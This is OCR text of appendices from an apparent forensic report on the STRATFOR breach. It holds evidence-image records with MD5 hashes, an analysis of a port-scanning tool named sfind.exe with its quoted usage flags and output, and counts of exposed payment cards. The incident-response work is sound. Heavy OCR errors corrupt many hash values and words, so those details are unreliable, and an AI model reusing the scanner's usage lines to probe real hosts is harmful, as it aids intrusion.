

Zimbra Mail Server 


Date of Acquisition 


Decemt)er 31 , 201 1 


Volatile Data Captured? 


□ Yes 


S No 


Memory Captured? 


□ Yes 


No 


HDD MD5 Hast> Value 


5f878a4631d9296a7157fb8ae01604fa 


System Function 


Zimbra Mail Server part 5 ot RAID Array 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 



System 


Zimbra Mail Server 


Date of Acquisition 


December 31 , 201 1 


Volatile Data Captured? 


□ Yes 


E No 


Memory Captured? 


□ Yes 


S No 


HDD MD5 Hash Value 


3a688d9cf21 a85440cd 1 706484f7df5e 


System Function 


Zimbra Mail Server part 6 of RAID Array 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 



System 


Ztmbra Mail Server 


Date of Acquisition 


December 31, 2011 


Volatile Data Captured? 


□ Yes 


M No 


Memory Captured? 


□ Yes 


M No 


HDD MD5 Hash Value 


af2c87b61 cd90401 822250090e9a41 96 


System Function 


Zimbra Mail Server part 7 of RAID Array 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 



1 S^tem 


Zimbra Mail Server | 


Date of Acquisition 


December 31,2011 


Volatile Data Captured? 


□ Yes 


Kl No 


Memory Captured? 


□ Yes 


13 No 


HDD MD5 Hash Value 


b1 451 E)c901 05e8b56591 136359e8b3c4 
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System Function 


Zimbra Mail Server part 8 of RAID Array 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 



System 


Document Server 


Date of Acquisition 


Decembers!, 2011 


Volatile Data Captured? 


□ Yes 


No 


Memory Captured? 


□ Yes 


E No 


HDD MD5 Hast> Value 


1 9C621 Al B21862A48A6E1 4E297C031 4E 


System Function 


Document Server Drive 1 


System (Computer) Name 






IP Address 




Operating System/Service Pack/Build 


Centos 




1 System 


Document Server 




Date of Acquisition 


December 31, 2011 


Volatile Data Captured? 


□ Yes 


El No 


Memory Captured? 


□ Yes 


El No 


HDD MD5 Hash Value 


B71 9A0AA9D63A34ODAC4E805AD30FEB8 


System Function 


Document Server Drive 2 


System (Computer) Name 






IP Address 




Operating System/Service Pack/Build 


Centos 




1 System 


Document Server 


Date of Acquisition 


December 31,2011 


Volatile Data Captured? 


□ Yes 


M No 


Memory Captured? 


□ Yes 


M No 


HDD MD5 Hasti Value 


1 6948093F60CB65CE2BF8744896BA7B3 


System Function 


Document Server Drive 3 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 
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1 System 


Document Server | 


Date of Acquisition 


Decemt)er 31 , 201 1 


Volatile Data Captured? 


□ Yes 


S No 


Memory Captured? 


□ Yes 


No 


HDD MD5 Hast> Value 


E2A83AF03D9020953DEF0E6A103C3130 


System Function 


Document Server Drive 4 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 



System 


Mail Server 


Date of Acquisition 


January 1,2012 


Volatile Data Captured? 


□ Yes 


E No 


Memory Captured? 


□ Yes 


S No 


HDD MD5 Hash Value 


4542d654581069a1c94a6c25934a625c 


System Function 


Mail Server Drive 1 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 



System 


Mail Server 


Date of Acquisition 


January 1, 2012 


Volatile Data Captured? 


□ Yes 


M No 


Memory Captured? 


□ Yes 


M No 


HDD MD5 Hash Value 


CBS 1 2206EB703DB94848B631 61 83CEF4 


System Function 


Mail Server Drive 2 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 



System 


Mail Server 


Date of Acquisition 


January 1,2012 


Volatile Data Captured? 


□ Yes 


Kl No 


Memory Captured? 


□ Yes 


13 No 


HDD MD5 Hash Value 


ee82f906b57c43c85c8a3f62924f9e9f 
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System Function 


Mail Server Drive 3 


System (Computer) Name 




IP Address 




Operating System/Service Pack/Build 


Centos 



System 


User Workstation 


Date of Acquisition 


January U, 2012 


Volatile Data Captured? 


□ Yes 


No 


Memory Captured? 


□ Yes 


E No 


HDD MD5 Hast> Value 


8877E60DA84C3962C9CCD66BCA425505 


System Function 


N.Geron's Workstation 



System 


User Workstation I 


Date ot Acquisition 


January 17, 2012 


Volatile Data Captured? 


□ Yes 


E No 


Memory Captured? 


□ Yes 


M No 


HDD MD5 Hash Value 


C55805tcd349bd6aa886d7390602bd1 4 


System Function 


K.Garry's Laptop 


Operating System/Service Pack/Build 


Mac OS X, 10.7.2 



System 


Research Development System | 


Date of Acquisition 


January 17, 2012 


Volatile Data Captured? 


□ Yes 


H No 


Memory Captured? 


□ Yes 


S No 


HDD MD5 Hash Value 


28239751 143E410533512A76501 EC7FS 


System Function 


Research Development System 


Operating System/Service Pack/Build 


Linux version 2.6.29 




1 System 


User Machine 1 


Date of Acquisition 


January 17, 2012 


Volatile Data Captured? 


□ Yes 


M No 


Memory Captured? 


□ Yes 


M No 


HDD MD5 Hash Value 


91 6t}cb274ae0ct)877f07c0a2d8f86952 


System Function 


X.Martin's Laptop 
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System 


User Laptop | 


Date of Acquisition 


January 25,2012 


Volatile Data Captured? 


□ Yes 


S No 


Memory Captured? 


□ Yes 


No 


HDD MD5 Hast> Value 


3776740068E1 7326E0E5BDFF46ECC27E 


System Function 


F.Burton's Laptop 


System (Computer) Name 


Strat-Burton 


Operating System/Service Pack/Build 


Microsoft Windows XP version 5.1 / Service Pack 3 / Build 2600 



System 


Dell Workstation 


Date of Acquisition 


January 25,2012 


Volatile Data Captured? 


□ Yes 


E No 


Memory Captured? 


□ Yes 


E No 


HDD MD5 Hast> Value 


69e0c79c7287a2fe5fl019e25de33221 


System Function 


Dell Workstation 


System (Computer) Name 


DELL211E 


Operating System/Service Pack/Build 


Microsoft Windows XP version 5.1 / Service Pack 3 / Build 2600 



System 


User Laptop 




Date of Acquisilion 


January 25, 2012 


Volatile Data Captured? 


□ Yes 


H No 


Memory Captured? 


E Yes 


□ No 


HDD MD5 Hasti Value 


5F89822EF8E383ED92A521 BEC3CBE864 


System Function 


Massey's Laptop 


System (Computer) Name 


HOPEMASSEY-PC 


Operating System/Service Pack/Build 


Microsoft Windows 7 




System 


User Laptop 


Date of Acquisition 


January 25, 2012 


Volatile Data Captured? 


□ Yes 


M No 


Memory Captured? 


□ Yes 


H No 


HDD MD5 Hasti Value 


bbecl ffc9b5c4e2d465aa58050499adf 


System Function 


Powers' Laptop 
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System 


User Laptop | 


Date of Acquisition 


January 25,2012 


Volatile Data Captured? 


□ Yes 


S No 


Memory Captured? 


□ Yes 


No 


HDD MD5 Hast> Value 


a778135tbc890c55b956ca4d221e62c7 


System Function 


UPS Laptop 


System (Computer) Name 


STRAT-E6400 


Operating System/Service Pack/Build 


Microsoft Windows XP version 5.1 / Service Pack 3 / Build 2600 



System 


Active Directory Server | 


Date of Acquisition 


January 25,2012 


Volatile Data Captured? 


M Yes 


□ No 


Memory Captured? 


M Yes 


□ No 


HDD MD5 Hast> Value 


c7a956f ee44e48755b2aa 1 e 1 7a53a31 a 


System Function 


Windows Active Directory Server Drive 1 


System (Computer) Name 


STRATFOR 


Operating System/Service Pack/Build 


Microsoft Windows Sen/er 2003 / Service Pack 2 / Build 3790 



System 


Active Directory Server 




Date of Acquisilion 


January 25, 2012 


Volatile Data Captured? 


Yes 


□ No 


Memory Captured? 


El Yes 


□ No 


HDD MD5 Hasti Value 


49f0fe86b1e3d72aedb81d510e9c1adl 


System Function 


Windows Active Directory Server Drive 2 


System (Computer) Name 


STRATFOR 


Operating System/Service Pack/Build 


Microsoft Windows Server 2003 / Service Pack 2 / Build 3790 



VBF iTOt tbus'ness 



Page 62 of 66 



68678 



strategic Forecasting, Inc. - Computer Forensic Report 



Appendix C. Malware 

C.1. Automated Malware Scan 

Because most data breacti incidents involve ttie use of malware, Verizon Business used a commercial 
malware scanner configured with the latest virus definitions to find malware resident on the In-scope 
systems. This antivirus program used, Mcafee VIrusScan, Is designed to detect a variety of malware 
utilizing advance heuristics methods against emerging threats commonly used in the wild. The forensic 
Image files created during the Image acquisition (of non-destroyed systems) were mounted using FTK 
Imager, which enabled them to be analyzed through the forensic workstation as read-only logical drives. 
With the evidence drives mounted, Verizon Business ran sweeps across the mounted drives with the 
malware scanners. Results of the hash analysis revealed the presence of the following file: 



Filename 


File Path 


Size 


System 


sfind.exe 


WIND0W3\ 


21,504 bytes 


Windows AD server 



Table C.1 - Results of the Automated Malware Scan 



C.2. Malware Analysis 

In order to ascertain the primary function of the "sfind.exe" malware, Verizon Business conducted 
analysis of the program by executing and analyzing said malware In a test environment. The test bed 
was provisioned with Windows Server 2003; It was discovered on a system with this version of the 
Windows Operating System. 

Verizon Business used the program Regshot to gain an understanding of how the malware modifies the 
host system once It Is Installed. Regshot Is a utility that allows users to take a snap shot of their systems 
and then compare that snapshot to one taken at a later point In time. Verizon Business took a snapshot 
of the test system before running the malicious file, and then one aften/vards. The two snapshots were 
then compared to discover what, If any, modifications had been made fo the system. Through this 
analysis Verizon Business discovered that the "sfind.exe" malware modified the registry settings of the 
host system and created a fxt flle,"sflnd.txt'' in the /WINDOWS/ directory (this being the same directory 
that the malware was contained In). When the "sfind.txf file is Initially created it Is empty and has a 
logical size of 0 bytes. 

After discovering how the "sfind.exe" malware modifies a system after it has been run, Verizon Business 
conducted a packet capture analysis of the test environment using Wireshark, a widely used network 
traffic capture application. Verizon Business captured the network traffic of the test environment after 
running the malicious executable. The results of the packet capture indicated no evidence of the malware 
''reaching out" to any foreign Internet hosts. Nor was there evidence to suggest that the malware was 
listening for commands from another system online. 

As a final step in Its analysis of the "sfind.exe" malware, Verizon Business ran the program in the 
command prompt of the test environment. The figure below contains a screenshot of the output from the 
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''sfind.exe" malware after being run in the Command Prompt. An internet searcfi for tfie 
"sw.sun.myetang.com" website provided no information as the website was no ionger active. 



cv Command Prompt 


Example: sfind-exe -p 3389 
sf ind.exe — cgi 
sfind.exe -ftp 
sfind.exe -idq 
sfind.exe -codered 


-admin 


G:\UlNDOWS>sf ind.exe p 192.168.1.1 




=========SFind conmand line super tools 

========^y Sunu 1999-2001- http://sw_sun 


version 1,85========= 

_ m i|e t ang _com 


192.168.1.1 Port:80 listening 

Please i^ait 9 Thread end 

1 Host search corrplete. Find 1 port<s>? 





Figure C.2.1a - Output after Running tiie sfind.exe lUlaiware 

After running the "sfind.exe" maiware over severai subsequent instances, Verizon Business discovered 
that the output of tfie program was being written to tfie "sfind.txt" fiie. The figure below contains a 
screenshot of the modified ''sfind.txt" fiie after running the "sfind.exe" maiware muitipie times. 



afind.tKt - Notepad 



File Edit Format View Help 



OMMAND : s"find_exG help 

COMMAND OVER. 



COMMAND : nd- exe -p 
COMMAND : s"Find.exe -p 
^92. 16S_ 1. 1 POTT : 80 1 i sTenn ng 

COMMAND OVER- 



COMMAND : sf 1 nd. exe -ftp 

COMMAND OVER. 



COMMAND : sfind.exe -cgi 

COMMAND OVER- 



COMMAND : sf 1 nd- exe -coder ed 
COMMAND OVER. 



Figure C.2.1b - Contents of the sfind.txt file 

The contents of the "sfind.txt" fiie provided evidence that the "sfind.exe" maiware scans the IP address of 
the system (based upon the IP address given to the maiware upon execution) to find open and active 
ports. This maiware could be used by an attacker to probe a server for open and active ports which could 
then be exploited. 



Based on the analysis of the "sfind.exe" maiware, the evidence suggests that the maiware was not run on 
the Windows AD server in STIWTFOR's environment. Analysis of the Windows AD server in EnCase 
provided no evidence that the "sfind.txt" file had been created, or had even existed on the server prior to 
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Ihe time that the lorensic image of ttie system was created. As stated above, ttie ^sfind.txt'' file is created 
wtien the ''sfind.exe" maiware is run on a system. Had the fiie existed on the system at any time, there 
wouid have been forensic evidence of the file contained on the system. No such evidence existed on the 
Windows AD server. 
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Appendix D. Credit Card Data Parsing 

To identity payment card data potentially at-risk, Verizon examined the MySQL database server for ttie 
presence ot valid payment card data. Valid payment card data is defined as track I and/or track II data 
with a Mod 10 verified Primary Account Number (PAN). At the time ot the breach, STRATFOR transacted 
only in card-not-present data. As such, there is no Track data anywhere in scope for this investigation. 

Payment Card Data Overview 

Verizon Business conducted a keyword search for payment card data against the MySQL database 
server, with results yielding Primary Account Numtiers that were stored alongside CVC2/CVV2, expiration 
date, and customer address. As a result of this exercise, Verizon fuNy enumerated the scope of 
cardholder data included in both the exfiltrated dataset, as well as the database itself. There is a siight 
discrepancy in the scope of data between the two datasets. The full card counts contained in each ot the 
datasets is included below: 



Card Brand 


In Exfiltrated Data Set 


In Database 


Visa 


37350 


38231 


MasterCard 


21589 


22078 


Discover 


1509 


1545 


Am Ex 


18614 


19068 



It should be noted that the initial data dump comprising the exfiltrated data elements was created on 
November 16, 2011. The STRATFOR V^eb and database environment did not actually go out of 
production until December 24, 2011. This discrepancy in card counts can be explained by those new 
customers whose information was added to the database between November 16, 2011 and December 
24, 2011. There is no evidence at all to suggest that card numbers beyond those discovered in the 
database dump file were compromised from the STRATFOR environment. 
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